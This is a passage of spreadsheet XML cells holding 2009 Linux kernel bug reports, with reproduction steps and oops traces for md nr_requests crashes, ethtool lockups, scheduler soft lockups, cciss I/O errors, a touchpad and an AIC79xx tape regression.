    <t>Subject : iwlagn: order 2 page allocation failures Submitter : Frans Pop &lt;elendil@planet.nl&gt; Date : 2009-09-06 7:40 References : http://marc.info/?l=linux-kernel&amp;m=125222287419691&amp;w=4 Handled-By : Pekka Enberg &lt;penberg@cs.helsinki.fi&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>OOPS when setting nr_requests for md devices</t>
  </si>
  <si>
    <t>2.6.31-rc9-git</t>
  </si>
  <si>
    <t>2009-09-08 08:48 UTC</t>
  </si>
  <si>
    <t>aCaB</t>
  </si>
  <si>
    <t>2009-10-12 21:28 UTC</t>
  </si>
  <si>
    <t>Hi, Echoing any value to /sys/block/mdX/queue/nr_requests causes the kernel to OOPS and often to panic within 5-20 seconds. Doing the same for the underlaying block device works fine. Reproduces easily on all the boxes I've tried. Example bt: [ 6336.680154] BUG: unable to handle kernel NULL pointer dereference at (null) [ 6336.680159] IP: [&lt;ffffffff8102c8fc&gt;] __wake_up_common+0x26/0x72 [ 6336.680167] PGD 8d450067 PUD 8c91e067 PMD 0 [ 6336.680171] Oops: 0000 [#1] PREEMPT SMP [ 6336.680174] last sysfs file: /sys/devices/virtual/block/md3/queue/nr_requests [ 6336.680177] CPU 1 [ 6336.680179] Modules linked in: xt_tcpudp nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack iptable_filter ip_tables x_tables fglrx(P) ipv6 cpufreq_conservative cpufreq_powersave cpufreq_stats cpufreq_userspace cpufreq_ondemand microcode kvm_intel kvm fuse acpi_cpufreq freq_table coretemp it87 hwmon_vid loop snd_hda_codec_atihdmi snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_oss snd_seq_midi_event hid_a4tech snd_seq snd_timer snd_seq_device usbhid i2c_i801 evdev i2c_core snd soundcore button processor snd_page_alloc sr_mod cdrom uhci_hcd ehci_hcd floppy usbcore nls_base thermal fan thermal_sys [last unloaded: scsi_wait_scan] [ 6336.680225] Pid: 13570, comm: bash Tainted: P 2.6.31-rc9 #3 EP45T-DS3 [ 6336.680227] RIP: 0010:[&lt;ffffffff8102c8fc&gt;] [&lt;ffffffff8102c8fc&gt;] __wake_up_common+0x26/0x72 [ 6336.680232] RSP: 0018:ffff880072c59de8 EFLAGS: 00010096 [ 6336.680234] RAX: 0000000000000000 RBX: ffff88012d0d0058 RCX: 0000000000000000 [ 6336.680237] RDX: 0000000000000001 RSI: 0000000000000003 RDI: ffff88012d0d0058 [ 6336.680239] RBP: 0000000000000001 R08: ffffffffffffffe8 R09: 000000000000000a [ 6336.680242] R10: 0000000000066f6b R11: 0000000000000002 R12: 0000000000000000 [ 6336.680244] R13: ffff88012d0d0060 R14: 0000000000000000 R15: 0000000000000000 [ 6336.680247] FS: 00007f0137db96f0(0000) GS:ffff88002803e000(0000) knlGS:0000000000000000 [ 6336.680250] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 6336.680252] CR2: 0000000000000000 CR3: 0000000072c5c000 CR4: 00000000000026e0 [ 6336.680255] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 6336.680257] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 6336.680260] Process bash (pid: 13570, threadinfo ffff880072c58000, task ffff88008d430000) [ 6336.680262] Stack: [ 6336.680263] 00000003816fb4c0 ffff88012d0d0058 ffff88012d0d0000 0000000000000000 [ 6336.680267] &lt;0&gt; 0000000000000001 0000000000000046 0000000000000003 ffffffff8102ebe5 [ 6336.680271] &lt;0&gt; 0000000000002000 0000000000000005 ffffffff8165e170 0000000000000005 [ 6336.680276] Call Trace: [ 6336.680280] [&lt;ffffffff8102ebe5&gt;] ? __wake_up+0x30/0x44 [ 6336.680285] [&lt;ffffffff811d2c67&gt;] ? queue_requests_store+0x183/0x2aa [ 6336.680288] [&lt;ffffffff811d2df2&gt;] ? queue_attr_store+0x64/0x7f [ 6336.680292] [&lt;ffffffff81116130&gt;] ? sysfs_write_file+0xd0/0x107 [ 6336.680296] [&lt;ffffffff810c4f87&gt;] ? vfs_write+0xad/0x169 [ 6336.680299] [&lt;ffffffff810c50ff&gt;] ? sys_write+0x45/0x6e [ 6336.680303] [&lt;ffffffff8100ba2b&gt;] ? system_call_fastpath+0x16/0x1b [ 6336.680305] Code: 01 00 00 00 c3 41 57 41 89 cf 41 56 4d 89 c6 41 55 4c 8d 6f 08 41 54 55 89 d5 53 48 83 ec 08 89 74 24 04 48 8b 47 08 4c 8d 40 e8 &lt;49&gt; 8b 40 18 48 8d 58 e8 eb 2d 45 8b 20 4c 89 f1 44 89 fa 8b 74 [ 6336.680337] RIP [&lt;ffffffff8102c8fc&gt;] __wake_up_common+0x26/0x72 [ 6336.680340] RSP &lt;ffff880072c59de8&gt; [ 6336.680342] CR2: 0000000000000000 [ 6336.680344] ---[ end trace d5292aec4d1f06a9 ]--- [ 6336.680347] note: bash[13570] exited with preempt_count 2</t>
  </si>
  <si>
    <t>System unresponsive if I unplug network cable while ethtool -p is running</t>
  </si>
  <si>
    <t>2009-09-09 00:05 UTC</t>
  </si>
  <si>
    <t>dave graham</t>
  </si>
  <si>
    <t>2012-06-13 19:28 UTC</t>
  </si>
  <si>
    <t>Bruce Allan</t>
  </si>
  <si>
    <t>When a user runs the "ethtool -p ethX" to identify the physical interface by flashing the appropriate interface LED, and then removes the cable at that interface, the keyboard locks up. This is naturally annoying to customers with multi-port systems, who wish to use ethtool -p so that they can disconnect/connect interface cables to appropriate ports. I am told that this is because "the RTNL lock is held by ethtool, and the link [down] message needs the RTNL", which would, I think, make this a kernel issue. This has been known about within INTEL for over 3 years, but only recently come to my attention. I have verified it on a 2.6.30 system using a default kernel configuration and the e1000e driver.</t>
  </si>
  <si>
    <t>BUG: soft lockup - CPU#3 stuck for 61s!, while running cpu controller latency testcase on two containers parallaly</t>
  </si>
  <si>
    <t>2009-09-10 09:32 UTC</t>
  </si>
  <si>
    <t>Rishikesh</t>
  </si>
  <si>
    <t>2012-06-13 16:52 UTC</t>
  </si>
  <si>
    <t>Created attachment 23055 [details] Config-file-used Hitting this soft lock issue while running this scenario on 2.6.31-rc7 kernel on SystemX 32 bit on multiple machines. Scenario: - While running cpu controller latency testcase from LTP same time on two containers. Steps: 1. Compile ltp-full-20090731.tgz on host. 2. Create two container (Used lxc tool (http://sourceforge.net/projects/lxc/lxc-0.6.3.tar.gz) for creating container ) e.g: lxc-create -n foo1 lxc-create -n foo2 On first shell: lxc-execute -n foo1 -f /usr/etc/lxc/lxc-macvlan.conf /bin/bash on Second shell: lxc-execute -n foo2 -f /usr/etc/lxc/lxc-macvlan.conf /bin/bash 3. Either you run cpu_latency testcase alone or run "./runltp -f controllers" at same time on both the containers. 4. After testcase execution completes, you can see this message in dmesg. Expected Result: - Should not reproduce soft lock up issue. - This reproduces 3 times out of 5 tries. hrtimer: interrupt too slow, forcing clock min delta to 5843235 ns hrtimer: interrupt too slow, forcing clock min delta to 5842476 ns Clocksource tsc unstable (delta = 18749057581 ns) BUG: soft lockup - CPU#3 stuck for 61s! [cpuctl_latency_:17174] Modules linked in: bridge stp llc bnep sco l2cap bluetooth sunrpc ipv6 p4_clockmod dm_multipath uinput qla2xxx ata_generic pata_acpi usb_storage e1000 scsi_transport_fc joydev scsi_tgt i2c_piix4 pata_serverworks pcspkr serio_raw mptspi mptscsih mptbase scsi_transport_spi radeon ttm drm i2c_algo_bit i2c_core [last unloaded: scsi_wait_scan] Pid: 17174, comm: cpuctl_latency_ Tainted: G W (2.6.31-rc7 #1) IBM eServer BladeCenter HS40 -[883961X]- EIP: 0060:[&lt;c058aded&gt;] EFLAGS: 00000283 CPU: 3 EIP is at find_next_bit+0x9/0x79 EAX: c2c437a0 EBX: f3d433c0 ECX: 00000000 EDX: 00000020 ESI: c2c436bc EDI: 00000000 EBP: f063be6c ESP: f063be64 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 CR0: 80050033 CR2: 008765a4 CR3: 314d7000 CR4: 000006d0 DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 DR6: ffff0ff0 DR7: 00000400 Call Trace: [&lt;c0427b6e&gt;] cpumask_next+0x17/0x19 [&lt;c042c28d&gt;] tg_shares_up+0x53/0x149 [&lt;c0424082&gt;] ? tg_nop+0x0/0xc [&lt;c0424082&gt;] ? tg_nop+0x0/0xc [&lt;c042406e&gt;] walk_tg_tree+0x63/0x77 [&lt;c042c23a&gt;] ? tg_shares_up+0x0/0x149 [&lt;c042e836&gt;] update_shares+0x5d/0x65 [&lt;c0432af3&gt;] rebalance_domains+0x114/0x460 [&lt;c0403393&gt;] ? restore_all_notrace+0x0/0x18 [&lt;c0432e75&gt;] run_rebalance_domains+0x36/0xa3 [&lt;c043c324&gt;] __do_softirq+0xbc/0x173 [&lt;c043c416&gt;] do_softirq+0x3b/0x5f [&lt;c043c52d&gt;] irq_exit+0x3a/0x68 [&lt;c0417846&gt;] smp_apic_timer_interrupt+0x6d/0x7b [&lt;c0403c9b&gt;] apic_timer_interrupt+0x2f/0x34 BUG: soft lockup - CPU#2 stuck for 61s! [watchdog/2:11] Modules linked in: bridge stp llc bnep sco l2cap bluetooth sunrpc ipv6 p4_clockmod dm_multipath uinput qla2xxx ata_generic pata_acpi usb_storage e1000 scsi_transport_fc joydev scsi_tgt i2c_piix4 pata_serverworks pcspkr serio_raw mptspi mptscsih mptbase scsi_transport_spi radeon ttm drm i2c_algo_bit i2c_core [last unloaded: scsi_wait_scan] Pid: 11, comm: watchdog/2 Tainted: G W (2.6.31-rc7 #1) IBM eServer BladeCenter HS40 -[883961X]- EIP: 0060:[&lt;c042c313&gt;] EFLAGS: 00000246 CPU: 2 EIP is at tg_shares_up+0xd9/0x149 EAX: 00000000 EBX: f09b3c00 ECX: f0baac00 EDX: 00000100 ESI: 00000002 EDI: 00000400 EBP: f6cb7de0 ESP: f6cb7db8 DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 CR0: 8005003b CR2: 08070680 CR3: 009c8000 CR4: 000006d0 DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 DR6: ffff0ff0 DR7: 00000400 Call Trace: [&lt;c0424082&gt;] ? tg_nop+0x0/0xc [&lt;c0424082&gt;] ? tg_nop+0x0/0xc [&lt;c042406e&gt;] walk_tg_tree+0x63/0x77 [&lt;c042c23a&gt;] ? tg_shares_up+0x0/0x149 [&lt;c042e836&gt;] update_shares+0x5d/0x65 [&lt;c0432af3&gt;] rebalance_domains+0x114/0x460 [&lt;c0432e75&gt;] run_rebalance_domains+0x36/0xa3 [&lt;c043c324&gt;] __do_softirq+0xbc/0x173 [&lt;c043c416&gt;] do_softirq+0x3b/0x5f [&lt;c043c52d&gt;] irq_exit+0x3a/0x68 [&lt;c0417846&gt;] smp_apic_timer_interrupt+0x6d/0x7b [&lt;c0403c9b&gt;] apic_timer_interrupt+0x2f/0x34 [&lt;c0430d37&gt;] ? finish_task_switch+0x5d/0xc4 [&lt;c0744b11&gt;] schedule+0x74c/0x7b2 [&lt;c0590e28&gt;] ? trace_hardirqs_on_thunk+0xc/0x10 [&lt;c0403393&gt;] ? restore_all_notrace+0x0/0x18 [&lt;c0471e19&gt;] ? watchdog+0x0/0x79 [&lt;c0471e19&gt;] ? watchdog+0x0/0x79 [&lt;c0471e63&gt;] watchdog+0x4a/0x79 [&lt;c0449a53&gt;] kthread+0x70/0x75 [&lt;c04499e3&gt;] ? kthread+0x0/0x75 [&lt;c0403e93&gt;] kernel_thread_helper+0x7/0x10 [root@hs40 ltp-full-20090731]# uname -a Linux hs40.in.ibm.com 2.6.31-rc7 #1 SMP Thu Sep 3 10:14:41 IST 2009 i686 i686 i386 GNU/Linux [root@hs40 ltp-full-20090731]#</t>
  </si>
  <si>
    <t>end_request: I/O error, dev cciss/cXdX, sector 0</t>
  </si>
  <si>
    <t>2009-09-11 07:42 UTC</t>
  </si>
  <si>
    <t>jiri.harcarik</t>
  </si>
  <si>
    <t>2010-11-12 20:46 UTC</t>
  </si>
  <si>
    <t>After upgrade to the latest stable kernel on HP server with Smart Array Controller these errors occurs in /var/log/messages : Sep 10 12:42:45 node2 kernel: [ 91.568968] end_request: I/O error, dev cciss/c0d1, sector 0 Sep 10 12:42:45 node2 kernel: [ 91.575688] end_request: I/O error, dev cciss/c0d1, sector 0 Sep 10 12:42:45 node2 kernel: [ 91.719894] end_request: I/O error, dev cciss/c0d2, sector 0 Sep 10 12:42:45 node2 kernel: [ 91.720092] end_request: I/O error, dev cciss/c0d2, sector 0 Previous working kernel version that I tried is 2.6.30.4 without any errors.</t>
  </si>
  <si>
    <t>Elantech smart-pad touchpad not recognised on Gigabyte T1028X netbook</t>
  </si>
  <si>
    <t>2.6.31-10-generic</t>
  </si>
  <si>
    <t>2009-09-11 08:11 UTC</t>
  </si>
  <si>
    <t>Mark G. Saye</t>
  </si>
  <si>
    <t>2012-06-13 16:55 UTC</t>
  </si>
  <si>
    <t>Created attachment 23063 [details] dmesg.log lshal.log lspci-vvnn.log lsusb-v.log pbid.log proc_version_signature.log tpconfig-i.log uname-a.log xorg.conf I'm using Ubuntu Karmic alpha5 on a new Gigabyte T1028 TouchNote netbook/tablet - the touchpad is not being recognised. Windows XP reports this as an Elantech Smart-Pad (multi-touch). Hopefully the attachments give more information. Product specification can be found here: http://www.emc.com.tw/twn/tpn_sp_ps.asp</t>
  </si>
  <si>
    <t>AIC79xx is not working properly with an attached scsi tape since 2.6.29</t>
  </si>
  <si>
    <t>2.6.27 (working), 2.6.30 (not working)</t>
  </si>
  <si>
    <t>2009-09-11 09:18 UTC</t>
  </si>
  <si>
    <t>g.giorgetti</t>
  </si>
  <si>
    <t>2012-06-13 16:56 UTC</t>
  </si>
  <si>
    <t>Both kernels 2.6.27 and 2.6.28 are working correctly. Since Linux 2.6.29 till 2.6.31rc8 the regression(?) is out there. Please let me know if I can provide any further details. Best regards, Gabriele ================= Here is the messages part for Linux 2.6.27: aic79xx 0000:41:01.0: PCI INT A -&gt; GSI 19 (level, low) -&gt; IRQ 19 scsi5 : Adaptec AIC79XX PCI-X SCSI HBA DRIVER, Rev 3.0 &lt;Adaptec 29320ALP PCIx Ultra320 SCSI adapter&gt; aic7901: Ultra320 Wide Channel A, SCSI Id=7, PCI-X 101-133Mhz, 512 SCBs target5:0:3: asynchronous scsi 5:0:3:0: Sequential-Access IBM HH LTO Gen 2 0376 PQ: 0 ANSI: 3 target5:0:3: Beginning Domain Validation target5:0:3: wide asynchronous target5:0:3: FAST-80 WIDE SCSI 160.0 MB/s DT (12.5 ns, offset 126) target5:0:3: Ending Domain Validation scsi 5:0:3:0: Attached scsi generic sg7 type 1 st: Version 20080504, fixed bufsize 32768, s/g segs 256 Driver 'st' needs updating - please use bus_type methods st 5:0:3:0: Attached scsi tape st0 st 5:0:3:0: st0: try direct i/o: yes (alignment 4 B) osst :I: Tape driver with OnStream support version 0.99.4 osst :I: $Id: osst.c,v 1.73 2005/01/01 21:13:34 wriede Exp $ Driver 'osst' needs updating - please use bus_type methods st0: Block limits 256 - 524288 bytes. ================= ================= Here is Linux 2.6.30: Aug 3 06:25:04 svil kernel: aic79xx 0000:41:01.0: PCI INT A -&gt; GSI 19 (level, low) -&gt; IRQ 19 Aug 3 06:25:04 svil kernel: scsi5 : Adaptec AIC79XX PCI-X SCSI HBA DRIVER, Rev 3.0 Aug 3 06:25:04 svil kernel: &lt;Adaptec 29320ALP PCIx Ultra320 SCSI adapter&gt; Aug 3 06:25:04 svil kernel: aic7901: Ultra320 Wide Channel A, SCSI Id=7, PCI-X 101-1 Aug 3 06:25:04 svil kernel: scsi 5:0:0:0: Attempting to queue an ABORT message:CDB: 0x12 0x0 Aug 3 06:25:04 svil kernel: scsi 5:0:0:0: Command already completed Aug 3 06:25:04 svil kernel: scsi 5:0:0:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:04 svil kernel: scsi 5:0:0:0: Command already completed Aug 3 06:25:04 svil kernel: scsi 5:0:0:0: Attempting to queue a TARGET RESET message:CDB: 0x Aug 3 06:25:04 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:04 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:04 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:04 svil kernel: Recovery SCB completes Aug 3 06:25:04 svil kernel: scsi 5:0:0:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:04 svil kernel: scsi 5:0:0:0: Command already completed Aug 3 06:25:04 svil kernel: scsi 5:0:0:0: Device offlined - not ready after error recovery Aug 3 06:25:04 svil kernel: scsi 5:0:1:0: Attempting to queue an ABORT message:CDB: 0x12 0x0 Aug 3 06:25:04 svil kernel: scsi 5:0:1:0: Command already completed Aug 3 06:25:04 svil kernel: scsi 5:0:1:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:04 svil kernel: scsi 5:0:1:0: Command already completed Aug 3 06:25:04 svil kernel: scsi 5:0:1:0: Attempting to queue a TARGET RESET message:CDB: 0x Aug 3 06:25:04 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:04 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:04 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:04 svil kernel: Recovery SCB completes Aug 3 06:25:04 svil kernel: scsi 5:0:1:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:04 svil kernel: scsi 5:0:1:0: Command already completed Aug 3 06:25:04 svil kernel: scsi 5:0:1:0: Device offlined - not ready after error recovery Aug 3 06:25:04 svil kernel: scsi 5:0:2:0: Attempting to queue an ABORT message:CDB: 0x12 0x0 Aug 3 06:25:04 svil kernel: scsi 5:0:2:0: Command already completed Aug 3 06:25:04 svil kernel: scsi 5:0:2:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:04 svil kernel: scsi 5:0:2:0: Command already completed Aug 3 06:25:04 svil kernel: scsi 5:0:2:0: Attempting to queue a TARGET RESET message:CDB: 0x Aug 3 06:25:04 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:04 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:05 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:05 svil kernel: Recovery SCB completes Aug 3 06:25:05 svil kernel: scsi 5:0:2:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:05 svil kernel: scsi 5:0:2:0: Command already completed Aug 3 06:25:05 svil kernel: scsi 5:0:2:0: Device offlined - not ready after error recovery Aug 3 06:25:05 svil kernel: scsi 5:0:3:0: Attempting to queue an ABORT message:CDB: 0x12 0x0 Aug 3 06:25:05 svil kernel: scsi5: At time of recovery, card was paused Aug 3 06:25:05 svil kernel: &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Dump Card State Begins &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; Aug 3 06:25:05 svil kernel: scsi5: Dumping Card State at program address 0x127 Mode 0x11 Aug 3 06:25:05 svil kernel: Card was paused Aug 3 06:25:05 svil kernel: INTSTAT[0x0] SELOID[0x3] SELID[0x0] HS_MAILBOX[0x0] Aug 3 06:25:05 svil kernel: INTCTL[0x0] SEQINTSTAT[0x0] SAVED_MODE[0x0] DFFSTAT[0x19] Aug 3 06:25:05 svil kernel: SCSISIGI[0xe6] SCSIPHASE[0x8] SCSIBUS[0x2] LASTPHASE[0xe0] Aug 3 06:25:05 svil kernel: SCSISEQ0[0x0] SCSISEQ1[0x12] SEQCTL0[0x0] SEQINTCTL[0x0] Aug 3 06:25:05 svil kernel: SEQ_FLAGS[0x0] SEQ_FLAGS2[0x4] QFREEZE_COUNT[0x0] Aug 3 06:25:05 svil kernel: KERNEL_QFREEZE_COUNT[0x0] MK_MESSAGE_SCB[0xff00] Aug 3 06:25:05 svil kernel: MK_MESSAGE_SCSIID[0xff] SSTAT0[0x2] SSTAT1[0x1] Aug 3 06:25:05 svil kernel: SSTAT2[0x0] SSTAT3[0x0] PERRDIAG[0x0] SIMODE1[0xac] Aug 3 06:25:05 svil kernel: LQISTAT0[0x0] LQISTAT1[0x0] LQISTAT2[0x0] LQOSTAT0[0x0] Aug 3 06:25:05 svil kernel: LQOSTAT1[0x0] LQOSTAT2[0x0] Aug 3 06:25:05 svil kernel: Aug 3 06:25:05 svil kernel: SCB Count = 4 CMDS_PENDING = 1 LASTSCB 0xffff CURRSCB 0x3 NEXTSC Aug 3 06:25:05 svil kernel: qinstart = 13 qinfifonext = 13 Aug 3 06:25:05 svil kernel: QINFIFO: Aug 3 06:25:05 svil kernel: WAITING_TID_QUEUES: Aug 3 06:25:05 svil kernel: Pending list: Aug 3 06:25:05 svil kernel: 3 FIFO_USE[0x0] SCB_CONTROL[0x40] SCB_SCSIID[0x37] Aug 3 06:25:05 svil kernel: Total 1 Aug 3 06:25:05 svil kernel: Kernel Free SCB list: 2 1 0 Aug 3 06:25:05 svil kernel: Sequencer Complete DMA-inprog list: Aug 3 06:25:05 svil kernel: Sequencer Complete list: Aug 3 06:25:05 svil kernel: Sequencer DMA-Up and Complete list: Aug 3 06:25:05 svil kernel: Sequencer On QFreeze and Complete list: Aug 3 06:25:05 svil kernel: Aug 3 06:25:05 svil kernel: Aug 3 06:25:05 svil kernel: scsi5: FIFO0 Free, LONGJMP == 0x80ff, SCB 0x0 Aug 3 06:25:05 svil kernel: SEQIMODE[0x3f] SEQINTSRC[0x0] DFCNTRL[0x0] DFSTATUS[0x89] Aug 3 06:25:05 svil kernel: SG_CACHE_SHADOW[0x2] SG_STATE[0x0] DFFSXFRCTL[0x0] Aug 3 06:25:05 svil kernel: SOFFCNT[0x0] MDFFSTAT[0x5] SHADDR = 0x00, SHCNT = 0x0 Aug 3 06:25:05 svil kernel: HADDR = 0x00, HCNT = 0x0 CCSGCTL[0x10] Aug 3 06:25:05 svil kernel: Aug 3 06:25:05 svil kernel: scsi5: FIFO1 Active, LONGJMP == 0x8063, SCB 0x3 Aug 3 06:25:05 svil kernel: SEQIMODE[0x3f] SEQINTSRC[0x0] DFCNTRL[0x4] DFSTATUS[0x89] Aug 3 06:25:05 svil kernel: SG_CACHE_SHADOW[0x2] SG_STATE[0x0] DFFSXFRCTL[0x0] Aug 3 06:25:05 svil kernel: SOFFCNT[0x0] MDFFSTAT[0x14] SHADDR = 0x06, SHCNT = 0x0 Aug 3 06:25:05 svil kernel: HADDR = 0x00, HCNT = 0x0 CCSGCTL[0x10] Aug 3 06:25:05 svil kernel: LQIN: 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x Aug 3 06:25:05 svil kernel: scsi5: LQISTATE = 0x0, LQOSTATE = 0x0, OPTIONMODE = 0x52 Aug 3 06:25:05 svil kernel: scsi5: OS_SPACE_CNT = 0x20 MAXCMDCNT = 0x0 Aug 3 06:25:05 svil kernel: scsi5: SAVED_SCSIID = 0x0 SAVED_LUN = 0x0 Aug 3 06:25:05 svil kernel: SIMODE0[0xc] Aug 3 06:25:05 svil kernel: CCSCBCTL[0x4] Aug 3 06:25:05 svil kernel: scsi5: REG0 == 0x3, SINDEX = 0x1e0, DINDEX = 0xe1 Aug 3 06:25:05 svil kernel: scsi5: SCBPTR == 0x3, SCB_NEXT == 0xffc0, SCB_NEXT2 == 0xff65 Aug 3 06:25:05 svil kernel: CDB 12 0 0 0 24 0 Aug 3 06:25:05 svil kernel: STACK: 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 Aug 3 06:25:05 svil kernel: &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; Dump Card State Ends &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Aug 3 06:25:05 svil kernel: scsi 5:0:3:0: Device is active, asserting ATN Aug 3 06:25:05 svil kernel: scsi5: Recovery code sleeping Aug 3 06:25:05 svil kernel: scsi5: Timer Expired (active 1) Aug 3 06:25:05 svil kernel: Recovery code awake Aug 3 06:25:05 svil kernel: scsi5: Command abort returning 0x2003 Aug 3 06:25:06 svil kernel: scsi 5:0:3:0: Attempting to queue a TARGET RESET message:CDB: 0x Aug 3 06:25:06 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:06 svil kernel: scsi5: Device reset timer expired (active 2) Aug 3 06:25:06 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:06 svil kernel: Recovery SCB completes Aug 3 06:25:06 svil kernel: Recovery SCB completes Aug 3 06:25:06 svil kernel: scsi 5:0:3:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi5: At time of recovery, card was not paused Aug 3 06:25:06 svil kernel: &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Dump Card State Begins &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; Aug 3 06:25:06 svil kernel: scsi5: Dumping Card State at program address 0x34 Mode 0x22 Aug 3 06:25:06 svil kernel: Card was paused Aug 3 06:25:06 svil kernel: INTSTAT[0x0] SELOID[0x3] SELID[0x0] HS_MAILBOX[0x0] Aug 3 06:25:06 svil kernel: INTCTL[0x80] SEQINTSTAT[0x0] SAVED_MODE[0x0] DFFSTAT[0x33] Aug 3 06:25:06 svil kernel: SCSISIGI[0x0] SCSIPHASE[0x0] SCSIBUS[0x0] LASTPHASE[0x1] Aug 3 06:25:06 svil kernel: SCSISEQ0[0x0] SCSISEQ1[0x12] SEQCTL0[0x0] SEQINTCTL[0x0] Aug 3 06:25:06 svil kernel: SEQ_FLAGS[0xc0] SEQ_FLAGS2[0x4] QFREEZE_COUNT[0x1] Aug 3 06:25:06 svil kernel: KERNEL_QFREEZE_COUNT[0x1] MK_MESSAGE_SCB[0xff00] Aug 3 06:25:06 svil kernel: MK_MESSAGE_SCSIID[0xff] SSTAT0[0x0] SSTAT1[0x8] Aug 3 06:25:06 svil kernel: SSTAT2[0x0] SSTAT3[0x0] PERRDIAG[0x0] SIMODE1[0xa4] Aug 3 06:25:06 svil kernel: LQISTAT0[0x0] LQISTAT1[0x0] LQISTAT2[0x0] LQOSTAT0[0x0] Aug 3 06:25:06 svil kernel: LQOSTAT1[0x0] LQOSTAT2[0x0] Aug 3 06:25:06 svil kernel: Aug 3 06:25:06 svil kernel: SCB Count = 4 CMDS_PENDING = 0 LASTSCB 0xffff CURRSCB 0x3 NEXTSC Aug 3 06:25:06 svil kernel: qinstart = 14 qinfifonext = 15 Aug 3 06:25:06 svil kernel: QINFIFO: 0x3 Aug 3 06:25:06 svil kernel: WAITING_TID_QUEUES: Aug 3 06:25:06 svil kernel: Pending list: Aug 3 06:25:06 svil kernel: 3 FIFO_USE[0x3] SCB_CONTROL[0x48] SCB_SCSIID[0x37] Aug 3 06:25:06 svil kernel: Total 1 Aug 3 06:25:06 svil kernel: Kernel Free SCB list: 2 1 0 Aug 3 06:25:06 svil kernel: Sequencer Complete DMA-inprog list: Aug 3 06:25:06 svil kernel: Sequencer Complete list: Aug 3 06:25:06 svil kernel: Sequencer DMA-Up and Complete list: Aug 3 06:25:06 svil kernel: Sequencer On QFreeze and Complete list: Aug 3 06:25:06 svil kernel: Aug 3 06:25:06 svil kernel: Aug 3 06:25:06 svil kernel: scsi5: FIFO0 Free, LONGJMP == 0x80ff, SCB 0x0 Aug 3 06:25:06 svil kernel: SEQIMODE[0x3f] SEQINTSRC[0x0] DFCNTRL[0x0] DFSTATUS[0x89] Aug 3 06:25:06 svil kernel: SG_CACHE_SHADOW[0x2] SG_STATE[0x0] DFFSXFRCTL[0x0] Aug 3 06:25:06 svil kernel: SOFFCNT[0x0] MDFFSTAT[0x5] SHADDR = 0x00, SHCNT = 0x0 Aug 3 06:25:06 svil kernel: HADDR = 0x00, HCNT = 0x0 CCSGCTL[0x10] Aug 3 06:25:06 svil kernel: Aug 3 06:25:06 svil kernel: scsi5: FIFO1 Free, LONGJMP == 0x8063, SCB 0x3 Aug 3 06:25:06 svil kernel: SEQIMODE[0x3f] SEQINTSRC[0x0] DFCNTRL[0x4] DFSTATUS[0x89] Aug 3 06:25:06 svil kernel: SG_CACHE_SHADOW[0x2] SG_STATE[0x0] DFFSXFRCTL[0x0] Aug 3 06:25:06 svil kernel: SOFFCNT[0x0] MDFFSTAT[0x5] SHADDR = 0x00, SHCNT = 0x0 Aug 3 06:25:06 svil kernel: HADDR = 0x00, HCNT = 0x0 CCSGCTL[0x10] Aug 3 06:25:06 svil kernel: LQIN: 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x Aug 3 06:25:06 svil kernel: scsi5: LQISTATE = 0x0, LQOSTATE = 0x0, OPTIONMODE = 0x52 Aug 3 06:25:06 svil kernel: scsi5: OS_SPACE_CNT = 0x20 MAXCMDCNT = 0x0 Aug 3 06:25:06 svil kernel: scsi5: SAVED_SCSIID = 0x0 SAVED_LUN = 0x0 Aug 3 06:25:06 svil kernel: SIMODE0[0xc] Aug 3 06:25:06 svil kernel: CCSCBCTL[0x0] Aug 3 06:25:06 svil kernel: scsi5: REG0 == 0x3, SINDEX = 0x119, DINDEX = 0xe1 Aug 3 